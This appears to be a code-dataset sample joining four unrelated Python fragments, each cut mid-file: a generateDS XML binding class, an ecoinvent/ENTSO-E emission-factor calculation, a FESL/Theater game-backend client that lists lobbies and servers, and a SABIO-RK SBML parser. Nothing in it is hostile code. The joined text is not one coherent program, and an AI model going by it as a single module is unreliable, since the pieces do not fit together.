self.DocumentCriteria = DocumentCriteria
self.DocumentCriteria_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ArrayOfDocumentCriteria)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ArrayOfDocumentCriteria.subclass:
return ArrayOfDocumentCriteria.subclass(*args_, **kwargs_)
else:
return ArrayOfDocumentCriteria(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_DocumentCriteria(self):
return self.DocumentCriteria
def set_DocumentCriteria(self, DocumentCriteria):
self.DocumentCriteria = DocumentCriteria
def add_DocumentCriteria(self, value):
self.DocumentCriteria.append(value)
def insert_DocumentCriteria_at(self, index, value):
self.DocumentCriteria.insert(index, value)
def replace_DocumentCriteria_at(self, index, value):
self.DocumentCriteria[index] = value
def hasContent_(self):
if (
self.DocumentCriteria
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfDocumentCriteria', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ArrayOfDocumentCriteria')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ArrayOfDocumentCriteria':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ArrayOfDocumentCriteria')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ArrayOfDocumentCriteria', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ArrayOfDocumentCriteria'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfDocumentCriteria', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for DocumentCriteria_ in self.DocumentCriteria:
namespaceprefix_ = self.DocumentCriteria_nsprefix_ + ':' if (UseCapturedNS_ and self.DocumentCriteria_nsprefix_) else ''
DocumentCriteria_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='DocumentCriteria', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'DocumentCriteria':
obj_ = DocumentCriteria.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.DocumentCriteria.append(obj_)
obj_.original_tagname_ = 'DocumentCriteria'
# end class ArrayOfDocumentCriteria
class DocumentCriteria(GeneratedsSuper):
"""DocumentCriteria"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, PIN=None, DocumentTypes=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.PIN = PIN
self.PIN_nsprefix_ = None
self.DocumentTypes = DocumentTypes
self.DocumentTypes_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, DocumentCriteria)
if subclass is not None:
return subclass(*args_, **kwargs_)
if DocumentCriteria.subclass:
return DocumentCriteria.subclass(*args_, **kwargs_)
else:
return DocumentCriteria(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_PIN(self):
return self.PIN
def set_PIN(self, PIN):
self.PIN = PIN
def get_DocumentTypes(self):
return self.DocumentTypes
def set_DocumentTypes(self, DocumentTypes):
self.DocumentTypes = DocumentTypes
def hasContent_(self):
if (
self.PIN is not None or
self.DocumentTypes is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='DocumentCriteria', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('DocumentCriteria')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'DocumentCriteria':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='DocumentCriteria')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='DocumentCriteria', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='DocumentCriteria'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='DocumentCriteria', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.PIN is not None:
namespaceprefix_ = self.PIN_nsprefix_ + ':' if (UseCapturedNS_ and self.PIN_nsprefix_) else ''
self.PIN.export(outfile, level, namespaceprefix_, namespacedef_='', name_='PIN', pretty_print=pretty_print)
if self.DocumentTypes is not None:
namespaceprefix_ = self.DocumentTypes_nsprefix_ + ':' if (UseCapturedNS_ and self.DocumentTypes_nsprefix_) else ''
self.DocumentTypes.export(outfile, level, namespaceprefix_, namespacedef_='', name_='DocumentTypes', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed | |
<gh_stars>0
# The original code requires pylcaio release v1.0, from Agez, found at:
# https://github.com/MaximeAgez/pylcaio
import pandas as pd
import numpy as np
import os, sys
import pickle
import logging
import pylcaio
fp_results = os.path.join(os.path.curdir, 'results')
fp_output = os.path.join(os.path.curdir, 'output')
def hybrid_emission_factors(trade_only, year):
Analysis = pylcaio.Analysis('ecoinvent3.5','exiobase3', method_double_counting='STAM')
# For making human-readable indices; consists of all ecoinvent process metadata
labels = Analysis.PRO_f
# Make DataFrame for whole ecoinvent requirements matrix with human-readable indices
Aff_labels = (labels.join(Analysis.A_ff,how='inner'))
Aff_labels = (Aff_labels).set_index(keys=['activityName', 'geography', 'productName'], append=True)
Aff_labels = Aff_labels.iloc[:,19:] # remove extraeneous metadata
Aff_labels.columns = Aff_labels.index
# Calculate life cycle impacts
I = pd.DataFrame(np.eye(len(Analysis.A_ff)), Analysis.A_ff.index, Analysis.A_ff.columns)
X = pd.DataFrame(np.linalg.solve(I-Analysis.A_ff, I), Analysis.A_ff.index, I.columns) # pro x pro
D = Analysis.C_f.fillna(0).dot(Analysis.F_f).dot(X) # pro x imp
D = D.T
D_labels = labels.join(D, how='inner')
D_labels.set_index(keys=['activityName', 'geography', 'productName'], append=True, inplace=True)
D_labels = D_labels.iloc[:, 19:]
D_labels = D_labels.T
# Other possible impact methods
imp_list = ['EDIP; environmental impact; global warming, GWP 100a; kg CO2-Eq', 'ReCiPe Midpoint (H); climate change; GWP100; kg CO2-Eq', 'ReCiPe Midpoint (H) V1.13; climate change; GWP100; kg CO2-Eq', 'IPCC 2013; climate change; GTP 100a; kg CO2-Eq']
D_labels_comp = D_labels.loc[imp_list]
D_labels = D_labels.loc['EDIP; environmental impact; global warming, GWP 100a; kg CO2-Eq']
# the footprint of all hybridized processes from ecoinvent, with their original footprint
fp_hybrid = os.path.join(os.path.curdir, 'data', 'Results_full_database_STAM_2011.xlsx')
hybrid_results = pd.read_excel(fp_hybrid, 'GWP_only_hyb', usecols='A:E,G', index_col=[0,1,2,3,4])
# ## List of ENTSO-E countries
country_list = ['AL','AT','BA','BE','BG','CH','CZ','DE','DK','EE',
'ES','FI','FR','GR','HR','HU','IE','IT','LT','LU',
'LV','ME','MK','NL','NO','PL','PT','RO','RS','SE',
'SI','SK','GB','TR','GE','CY','HR','NI','UK']
# Find all electricity processes
set(labels.loc[labels['activityName'].str.contains('electricity')]['activityName'])
# Isolate high voltage (production) mixes and low voltage mixes (which includes solar PV)
# note that pumped storage hydropower in CH gets excluded as it has 0 contribution to the production mix (for whatever reason)
market_mixes = labels.loc[labels['activityName'].str.contains('electricity, high voltage, production mix')] # production mixes, do not include solar or waste (or Swiss pumped hydro)
waste_mixes = labels.loc[labels['activityName'].str.contains('electricity, from municipal waste incineration to generic market for electricity, medium voltage')] # production mixes, do not include solar
solar_mixes = labels.loc[labels['activityName'].str.contains('electricity, low voltage')] # use low voltage mixes to get shares of solar photovoltaic
# ### Filter for high-voltage production mixes
# First, retrieve electricity mixes, and reduce un-needed processes
df = Aff_labels[market_mixes.index]
df_waste = Aff_labels.loc[waste_mixes.index]
df_solar = Aff_labels[solar_mixes.index]
df = df.loc[:, df.columns.isin(country_list, level=2)]
# manual workaround for keeping CH pumped hydro after removing unneeded rows
# (since this ecoinvent process apparently does not contribute to any electricity mixes in ecoinvent)
ind =('69ccf019-081e-42e3-b7f5-879dc7dde86a_66c93e71-f32b-4591-901c-55395db5c132', 'electricity production, hydro, pumped storage', 'CH', 'electricity, high voltage') # Activityid for Swiss pumped hydro
col = df.columns.get_loc(('54ed269b-e329-469c-902e-a8991ee7d24a_66c93e71-f32b-4591-901c-55395db5c132', 'electricity, high voltage, production mix', 'CH', 'electricity, high voltage'))
index = df.index.get_loc(ind)
df.iloc[index, col] = 1e-7
df = df.replace(0, np.nan).dropna(how='all', axis=0)
# ### Filter for medium-voltage mixes ( to find waste incineration shares)
df_waste = df_waste.loc[:, df_waste.columns.isin(country_list, level=2)]
df_waste = df_waste.replace(to_replace=0, value=np.nan).dropna(how='all', axis=0)
# check unique waste incineration activities
set(df_waste.index.get_level_values('activityName'))
# ### Filter for low-voltage mixes (to find solar photovoltaic shares)
df_solar = df_solar.loc[:, df_solar.columns.isin(country_list, level=2)]
df_solar = df_solar.replace(to_replace=0, value=np.nan).dropna(how='all', axis=0)
# ### Develop correspondence between ecoinvent and ENTSO-E technology categories
# Correspondence from ENTSO-E technology categories to keywords for searching in ecoinvent processes
# Note that the 'fossil oil shale', 'other' and 'other renewable' do not have ecoinvent equivalents;
# these are dealt with later
tec_dict = {'Biomass': ['biogas', 'wood chips'],
'Fossil Brown coal/Lignite': 'lignite',
'Fossil Coal-derived gas': 'coal gas',
'Fossil Gas': 'natural gas',
'Fossil Hard coal': 'hard coal',
'Fossil Oil': ' oil',
'Fossil Oil shale': '--',
'Fossil Peat': 'peat',
'Geothermal': 'geothermal',
'Hydro Pumped Storage': 'pumped storage',
'Hydro Run-of-river and poundage': 'run-of-river',
'Hydro Water Reservoir': 'reservoir',
'Nuclear': 'nuclear',
'Other': '---',
'Other renewable': '----',
'Solar': ['solar thermal', 'solar tower', 'photovoltaic'],
'Waste': 'waste incineration',
'Wind Offshore': 'offshore',
'Wind Onshore': 'onshore'
}
# reverse correspondence from ecoinvent search keywords to ENTSO-E categories
temp_tecdict = { 'biogas':'Biomass',
'wood chips':'Biomass',
'lignite': 'Fossil Brown coal/Lignite' ,
'coal gas': 'Fossil Coal-derived gas',
'natural gas': 'Fossil Gas' ,
'hard coal': 'Fossil Hard coal' ,
' oil': 'Fossil Oil',
'--' : 'Fossil Oil shale',
'peat': 'Fossil Peat' ,
'geothermal':'Geothermal',
'pumped storage': 'Hydro Pumped Storage',
'run-of-river': 'Hydro Run-of-river and poundage',
'reservoir': 'Hydro Water Reservoir',
'nuclear' : 'Nuclear',
'---':'Other' ,
'----': 'Other renewable',
'solar thermal': 'Solar',
'solar tower': 'Solar',
'photovoltaic': 'Solar',
'waste incineration': 'Waste', # 'electricity, from municipal waste incineration to generic market for electricity, medium voltage',
'offshore': 'Wind Offshore',
'onshore':'Wind Onshore'
}
# flatten tec list
tec_list = list(tec_dict.values())
for item in tec_list:
if type(item)==list:
for subitem in item:
tec_list.append(subitem)
tec_list.remove(item)
# Get list of solar PV processes in ecoinvent
d = list(set(df_solar.index.get_level_values(level=1)))
pv = [entry for entry in d if 'electricity production' in entry] # all low-voltage production technologies
# Fetch waste incineration process names
waste = ['electricity, from municipal waste incineration to generic market for electricity, medium voltage']
# Make list of electricity generation technologies (both high voltage and low-voltage, i.e., solar PV)
ecoinvent_tecs = list(set(df.index.get_level_values(level=1))) + pv + waste
# Quality assurance; make sure all ecoinvent technologies are covered by the keyword search, and keyword matches are correct
# also, check number of matches for each keyword
matches = []
match_keys = []
num_matches = dict((keyword,0) for keyword in tec_list)
for tec in ecoinvent_tecs:
for keyword in tec_list:
if keyword in tec and tec not in matches:
# print(f'{keyword} is in {tec}')
matches.append(tec)
match_keys.append(temp_tecdict[keyword])
num_matches[keyword] += 1
print(num_matches)
# Find ecoinvent tecs that were not matched
if len(ecoinvent_tecs)-len(matches) > 0:
print('ecoinvent process(es) not matched:')
print(set(ecoinvent_tecs).difference(set(matches)))
# Correspondence of ENTSO-E categories and specific ecoinvent processes
from collections import defaultdict
ei_tec_dict = defaultdict(list) # keys as entso-e categories, values are corresponding ei
rev_ei_tec_dict = defaultdict(list) # vice-versa; keys as ei, values are entso-e categories
for i, j in zip(match_keys, matches):
ei_tec_dict[i].append(j)
rev_ei_tec_dict[j].append(i)
# Build correspondence table for Supplementary Information
tec_index = pd.Index(list(ei_tec_dict.keys()))
tec_values = list(ei_tec_dict.values())
ei_tec_table = pd.DataFrame(tec_values, index=tec_index).stack()
ei_tec_table.index = ei_tec_table.index.droplevel(level=1)
ei_tec_table.sort_index(axis=0, inplace=True)
# ### Calculate shares of ecoinvent processes
# For multi-process technology categories, e.g., solar, biomass...
# combine high-, medium- and low-voltage electricity mixes for full tech resolution
f = pd.concat([df, df_waste, df_solar], axis=1)
rev_ei_tec_dict = {k: v for k, v in rev_ei_tec_dict.items() if not not v}
temp_list = f.index.get_level_values('activityName')
entso_list = []
f_check = []
# For every activity in ecoinvent,if they are related to electricity production, add to entso_list
# If not, drop from the matrix; they are irrelevant
for entry in temp_list:
try:
entso_list.append(rev_ei_tec_dict[entry])
except:
f_check.append(entry)
f.drop(index=set(f_check), level=1, axis=0, inplace=True)
# inputs to electricity mixes not included in the calculations of emission factors
set(f_check)
entso_list = [item for sublist in entso_list for item in sublist] #flatten list
entso_index = pd.Index(tuple(entso_list), name='entso_e')
f.set_index(entso_index, append=True, inplace=True)
# ### Get shares of each ecoinvent process for each ENTSO-E technology category
f_gpby = f.groupby(level='entso_e')
# Get shares of each ecoinvent process in each ENTSO-E technology category;
# for calculating weighted average for emission factor
ei_process_shares = f.divide(f_gpby.sum(), level=4, axis=1)
hybrid_temp = hybrid_results.reset_index(level=[1,2,3,4], drop=True)
g_temp = ei_process_shares.reset_index(level=[1,2,3,4], drop=True)
# ### Calculate weighted average, hybridized emissions factor for each technology
ef = ei_process_shares.mul(hybrid_temp.iloc[:, 0], axis=0, level=0)
ef_aggregated = ef.groupby(level='entso_e').sum()
ef_countries = ef_aggregated.sum(axis=1, level='geography')
ef_countries.replace(0, np.nan, inplace=True)
ef_countries.dropna(axis=1, how='all', inplace=True)
ef_countries.sort_index(inplace=True)
ef_countries = ef_countries.T
ef_countries.sort_index(axis=0, inplace=True)
entso_fp = os.path.join(fp_output, 'entsoe', 'ENTSO_production_volumes_' + str(year) + '.csv')
entso_e_production = pd.read_csv(entso_fp, header=0, index_col=[0])
entso_e_production.replace(0, np.nan,inplace=True)
entso_mask = entso_e_production.isna().sort_index()
ef_mask = ef_countries.sort_index().isna()
entso_mask.drop(columns=['Fossil Oil shale', 'Other', 'Other renewable', 'Marine'], inplace=True)
entso_mask.index.rename('geography', inplace=True)
entso_mask.columns.rename('entso_e', inplace=True)
# Countries for which we have production data, but no hybridized emission factors
no_ef_countries = set(entso_e_production.index) - set(ef_countries.index)
print('Countries with production data, but no hybridized emission factors:')
print(no_ef_countries)
logging.warning(f'{no_ef_countries} have production data from ENTSO_E but no hybridized emission factors')
list(set(ef_countries.columns) - set(entso_e_production.index))
check_df = entso_mask.eq(ef_mask, axis=0)
# Find countries missing from ecoinvent
missing_countries = []
for country, row in check_df.iterrows():
if not row.any():
missing_countries.append(country)
# Optionally, drop them from mask
check_df.drop(index = missing_countries, inplace=True)
# Find the technology-country pairs that are missing hybridized emission factors
countries_missing_ef = {}
for tec, col in check_df.iteritems():
temp = check_df.index[check_df[tec] == False].tolist()
print(f'For {tec}, regionalized, hybridized emission factors are missing for | |
available_packet_length):
query_chunk = stats_query_enc[i:i + available_packet_length]
chunk_packet = FeslPacket.build(
b'rank\xf0\x00\x00\x00',
b'size=' + encoded_query_size.encode('utf8') + b'\ndata=' + query_chunk,
tid
)
chunk_packets.append(chunk_packet)
return chunk_packets
@staticmethod
def is_valid_login_response(response: Packet) -> Tuple[bool, str]:
valid = b'lkey=' in response.body
if not valid:
lines = response.get_data_lines()
message = next((line[18:-1] for line in lines if line.startswith(b'localizedMessage=')), b'').decode('utf8')
else:
message = ''
return valid, message
@staticmethod
def parse_list_response(raw_response: bytes, list_entry_prefix: bytes) -> Tuple[List[dict], List[bytes]]:
lines = raw_response.split(b'\n')
# Assign lines to either data or meta lines
meta_lines = []
data_lines = []
for line in lines:
if line.startswith(list_entry_prefix) and list_entry_prefix + b'[]' not in line:
# Append data line (without entry prefix)
# So for userInfo.0.userId=226804555, only add 0.userId=226804555 (assuming prefix is userInfo.)
data_lines.append(line[len(list_entry_prefix):])
else:
# Add meta data lines as is
meta_lines.append(line)
# Determine data entry count
length_info = next(line for line in meta_lines if b'.[]' in line)
entry_count = int(length_info.split(b'=').pop())
# Init dict list
datasets = [{} for _ in range(0, entry_count)]
# Sort reverse to get sub-list length indicators first
# (99.addStats.[]=10 will be sorted before 99.addStats.9.value=777.678)
for line in sorted(data_lines, reverse=True):
# Split into keys and data and split into index and key
# line format will something like: 0.userId=22680455
elements = line.split(b'=')
key_elements = elements[0].split(b'.')
index = int(key_elements[0])
key = key_elements[1].decode()
value = elements[1].decode()
# Add sub-list (99.addStats.9.value=777.678) or simple scalar value (99.value=8.367105024E9)
if len(key_elements) >= 3 and b'.[]=' in line:
# If line contains a sub-list length indicator, init sub list of given length
datasets[index][key] = [{} for _ in range(0, int(value))]
elif len(key_elements) >= 4:
# Line contains sub-list data => append to list at index and key
sub_index = int(key_elements[2])
sub_key = key_elements[3].decode()
datasets[index][key][sub_index][sub_key] = value
else:
# Add scaler value to dict
datasets[index][key] = value
return datasets, meta_lines
@staticmethod
def handle_list_response_packet(packet: Packet, list_entry_prefix: bytes) -> Tuple[bytes, bool]:
body = packet.get_data()
lines = packet.get_data_lines()
# Check for errors
if b'errorCode' in body:
method_line = next((line for line in lines if line.startswith(b'TXN')), b'')
method = method_line.split(b'=').pop()
error_code_line = next((line for line in lines if line.startswith(b'errorCode=')), b'')
error_code = error_code_line.split(b'=').pop()
if error_code == b'21':
raise ParameterError('FESL returned invalid parameter error')
elif error_code == b'101' and method == b'NuLookupUserInfo':
raise PlayerNotFoundError('FESL returned player not found error')
elif error_code == b'104' and method == b'NuSearchOwners':
# Error code is returned if a) no results matched the query or b) too many results matched the query
raise SearchError('FESL found no or too many results matching the search query')
else:
raise Error(f'FESL returned an error (code {error_code.decode("utf")})')
elif b'data=' not in body and list_entry_prefix + b'[]' not in body:
# Packet is neither one data packet of a multi-packet response nor a single-packet response
raise Error('FESL returned invalid response')
if b'data=' in body:
# Packet is one of multiple => base64 decode content
data_line = next(line for line in lines if line.startswith(b'data='))
# URL decode/unquote and base64 decode data
data = b64decode(unquote_to_bytes(data_line[5:]))
last_packet = data[-1:] == b'\x00'
# Remove "eof" indicator from last packet's data
if last_packet:
data = data[:-1]
else:
# Single packet response => return body as is
data = body
last_packet = True
return data, last_packet
@staticmethod
def format_search_response(parsed_response: List[dict], metadata: List[bytes]) -> dict:
namespace_line = next(line for line in metadata if line.startswith(b'nameSpaceId'))
namespace = namespace_line.split(b'=').pop()
return {
'namespace': namespace.decode('utf8'),
'users': parsed_response
}
class TheaterClient(Client):
lkey: bytes
completed_steps: Dict[TheaterStep, Packet]
def __init__(self, host: str, port: int, lkey: str, platform: Platform, timeout: float = 3.0,
track_steps: bool = True):
connection = Connection(host, port, TheaterPacket)
super().__init__(connection, platform, timeout, track_steps)
self.lkey = lkey.encode('utf8')
def connect(self) -> bytes:
"""
Initialize the connection to the Theater backend by sending the initial CONN/hello packet
:return: Response packet data
"""
if self.track_steps and TheaterStep.conn in self.completed_steps:
return bytes(self.completed_steps[TheaterStep.conn])
tid = self.get_transaction_id()
connect_packet = self.build_conn_paket(tid, BACKEND_DETAILS[self.platform]['clientString'])
self.connection.write(connect_packet)
response = self.connection.read()
self.completed_steps[TheaterStep.conn] = response
return bytes(response)
def authenticate(self) -> bytes:
"""
Authenticate against/log into the Theater backend using the lkey retrieved via FESL
:return: Response packet data
"""
if self.track_steps and TheaterStep.user in self.completed_steps:
return bytes(self.completed_steps[TheaterStep.user])
elif self.track_steps and TheaterStep.conn not in self.completed_steps:
self.connect()
tid = self.get_transaction_id()
auth_packet = self.build_user_packet(tid, self.lkey)
self.connection.write(auth_packet)
response = self.connection.read()
if not self.is_valid_authentication_response(response):
raise AuthError('Theater authentication failed')
self.completed_steps[TheaterStep.user] = response
return bytes(response)
def ping(self) -> None:
ping_packet = self.build_ping_packet()
self.connection.write(ping_packet)
def get_lobbies(self) -> List[dict]:
"""
Retrieve all available game (server) lobbies
:return: List of lobby details
"""
if self.track_steps and TheaterStep.user not in self.completed_steps:
self.authenticate()
tid = self.get_transaction_id()
lobby_list_packet = self.build_llst_packet(tid)
self.connection.write(lobby_list_packet)
# Theater responds with an initial LLST packet, indicating the number of lobbies,
# followed by n LDAT packets with the lobby details
llst_response = self.wrapped_read(tid)
llst = self.parse_simple_response(llst_response)
num_lobbies = int(llst['NUM-LOBBIES'])
# Retrieve given number of lobbies (usually just one these days)
lobbies = []
for i in range(num_lobbies):
ldat_response = self.wrapped_read(tid)
ldat = self.parse_simple_response(ldat_response)
lobbies.append(ldat)
return lobbies
def get_servers(self, lobby_id: int) -> List[dict]:
"""
Retrieve all available game servers from the given lobby
:param lobby_id: Id of the game server lobby
:return: List of server details
"""
if self.track_steps and TheaterStep.user not in self.completed_steps:
self.authenticate()
tid = self.get_transaction_id()
server_list_packet = self.build_glst_packet(tid, str(lobby_id).encode('utf8'))
self.connection.write(server_list_packet)
# Again, same procedure: Theater first responds with a GLST packet which indicates the number of games/servers
# in the lobby. It then sends one GDAT packet per game/server
glst_response = self.wrapped_read(tid)
# Response may indicate an error if given lobby id does not exist
is_error, error = self.is_error_response(glst_response)
if is_error:
raise error
glst = self.parse_simple_response(glst_response)
num_games = int(glst['LOBBY-NUM-GAMES'])
# Retrieve GDAT for all servers
servers = []
for i in range(num_games):
gdat_response = self.wrapped_read(tid)
gdat = self.parse_simple_response(gdat_response)
servers.append(gdat)
return servers
def get_server_details(self, lobby_id: int, game_id: int) -> Tuple[dict, dict, List[dict]]:
"""
Retrieve full details and player list for a given server
:param lobby_id: If of the game server lobby the server is hosted in
:param game_id: Game (server) id
:return: Tuple of (general server details, extended details, player list)
"""
if self.track_steps and TheaterStep.user not in self.completed_steps:
self.authenticate()
tid = self.get_transaction_id()
server_details_packet = self.build_gdat_packet(tid, str(lobby_id).encode('utf8'), str(game_id).encode('utf8'))
self.connection.write(server_details_packet)
# Similar structure to before, but with one difference: Theater returns a GDAT packet (general game data),
# followed by a GDET packet (extended server data). Finally, it sends a PDAT packet for every player
gdat_response = self.wrapped_read(tid)
# Response may indicate an error if given lobby id and /or game id do not exist
is_error, error = self.is_error_response(gdat_response)
if is_error:
raise error
gdat = self.parse_simple_response(gdat_response)
gdet_response = self.wrapped_read(tid)
gdet = self.parse_simple_response(gdet_response)
# Determine number of active players (AP)
num_players = int(gdat['AP'])
# Read PDAT packets for all players
players = []
for i in range(num_players):
pdat_response = self.wrapped_read(tid)
pdat = self.parse_simple_response(pdat_response)
players.append(pdat)
return gdat, gdet, players
def is_auto_respond_packet(self, packet: Packet) -> Tuple[bool, Optional[Callable]]:
is_auto_respond_packet, handler = False, None
# Check if packet is a ping prompt
if packet.header.startswith(b'PING'):
is_auto_respond_packet = True
handler = self.ping
return is_auto_respond_packet, handler
@staticmethod
def build_conn_paket(tid: int, client_string: bytes) -> TheaterPacket:
"""
Build the initial hello/connection packet
:param tid: Transaction id (usually 1, must be sent as first packet)
:param client_string: Game client string (e.g. "bfbc2-pc")
:return: Complete packet to establish connection
"""
return TheaterPacket.build(
b'CONN@\x00\x00\x00',
b'PROT=2\nPROD=' + client_string + b'\nVERS=1.1\nPLAT=PC\nLOCALE=en_US\nSDKVERSION=5.0.0.0.0',
tid
)
@staticmethod
def build_user_packet(tid: int, lkey: bytes) -> TheaterPacket:
"""
Build the user/login packet
:param tid: Transaction id (usually 2, must be sent as second packet)
:param lkey: Login key from a FESL session
:return: Complete packet to perform login
"""
return TheaterPacket.build(
b'USER@\x00\x00\x00',
b'MAC=$000000000000\nSKU=125170\nLKEY=' + lkey + b'\nNAME=',
tid
)
@staticmethod
def build_ping_packet() -> TheaterPacket:
"""
Build a ping response packet
:return: Complete packet to respond to ping with
"""
return TheaterPacket.build(
b'PING\x00\x00\x00\x00',
b'TID=0'
)
@staticmethod
def build_llst_packet(tid: int) -> TheaterPacket:
"""
Build the llst/lobby list packet
:param tid: Transaction id
:return: Complete packet to list all available game lobbies
"""
return TheaterPacket.build(
b'LLST@\x00\x00\x00',
b'FILTER-FAV-ONLY=0\nFILTER-NOT-FULL=0\nFILTER-NOT-PRIVATE=0\nFILTER-NOT-CLOSED=0\nFILTER-MIN-SIZE=0\n'
b'FAV-PLAYER=\nFAV-GAME=\nFAV-PLAYER-UID=\nFAV-GAME-UID=',
tid
)
@staticmethod
def build_glst_packet(tid: int, lid: bytes) -> | |
enzyme
Returns:
:obj:`tuple`:
* :obj:`Compound`: or :obj:`Enzyme`: compound or enzyme
* :obj:`dict`: additional properties of the compound/enzyme
* `is_wildtype` (:obj:`bool`): indicates if the enzyme is wildtype or mutant
* `variant` (:obj:`str`): description of the variant of the eznyme
* `modifier_type` (:obj:`str`): type of the enzyme (e.g. Modifier-Catalyst)
Raises:
:obj:`ValueError`: if a species is of an unsupported type (i.e. not a compound or enzyme)
"""
# id, name
type_id_compartment = sbml.getId().split('_')
type = type_id_compartment[0]
id = int(float(type_id_compartment[1]))
# modifier type
modifier_type = ''
if sbml.isSetAnnotation() \
and sbml.getAnnotation().hasChild('sabiork') \
and sbml.getAnnotation().getChild('sabiork').hasChild('modifierType'):
modifier_type = sbml \
.getAnnotation() \
.getChild('sabiork') \
.getChild('modifierType') \
.getChild(0) \
.getCharacters()
# create object or return existing object
if type == 'SPC':
name = sbml.getName()
properties = {'modifier_type': modifier_type}
query = self.session.query(Compound).filter_by(id=id)
if query.count():
specie = query.first()
else:
specie = Compound()
self.session.add(specie)
elif type == 'ENZ':
name, is_wildtype, variant = self.parse_enzyme_name(sbml.getName())
properties = {'is_wildtype': is_wildtype, 'variant': variant, 'modifier_type': modifier_type}
query = self.session.query(Enzyme).filter_by(id=id)
if query.count():
specie = query.first()
else:
specie = Enzyme()
self.session.add(specie)
else:
raise ValueError('Unsupported species type: {}'.format(type))
# set properties
specie.id = id
if specie.name is None:
specie.name = name
elif specie.name != name:
specie._is_name_ambiguous = True
# cross references
cross_references = self.create_cross_references_from_sbml(sbml)
if type == 'SPC':
specie.cross_references = cross_references
elif type == 'ENZ':
specie.subunits = []
specie.cross_references = []
for cross_reference in cross_references:
if cross_reference.namespace == 'uniprot':
specie.subunits.append(EnzymeSubunit(cross_references=[cross_reference]))
else:
specie.cross_references.append(cross_reference)
# updated
specie.modified = datetime.datetime.utcnow()
return (specie, properties)
def parse_enzyme_name(self, sbml):
""" Parse the name of an enzyme in SBML for the enzyme name, wild type status, and variant
description that it contains.
Args:
sbml (:obj:`str`): enzyme name in SBML
Returns:
:obj:`tuple`:
* :obj:`str`: name
* :obj:`bool`: if :obj:`True`, the enzyme is wild type
* :obj:`str`: variant
Raises:
:obj:`ValueError`: if the enzyme name is formatted in an unsupport format
"""
match = re.match(r'^(.*?)\(Enzyme\) (wildtype|mutant),?(.*?)$', sbml, re.IGNORECASE)
if match:
name = match.group(1)
is_wildtype = match.group(2).lower() == 'wildtype'
variant = match.group(3).strip()
return (name, is_wildtype, variant)
match = re.match(r'^Enzyme (wildtype|mutant),?( (.*?))*$', sbml, re.IGNORECASE)
if match:
if match.group(3):
name = match.group(3).strip()
else:
name = None
is_wildtype = match.group(1).lower() == 'wildtype'
variant = None
return (name, is_wildtype, variant)
match = re.match(r'^Enzyme - *$', sbml, re.IGNORECASE)
if match:
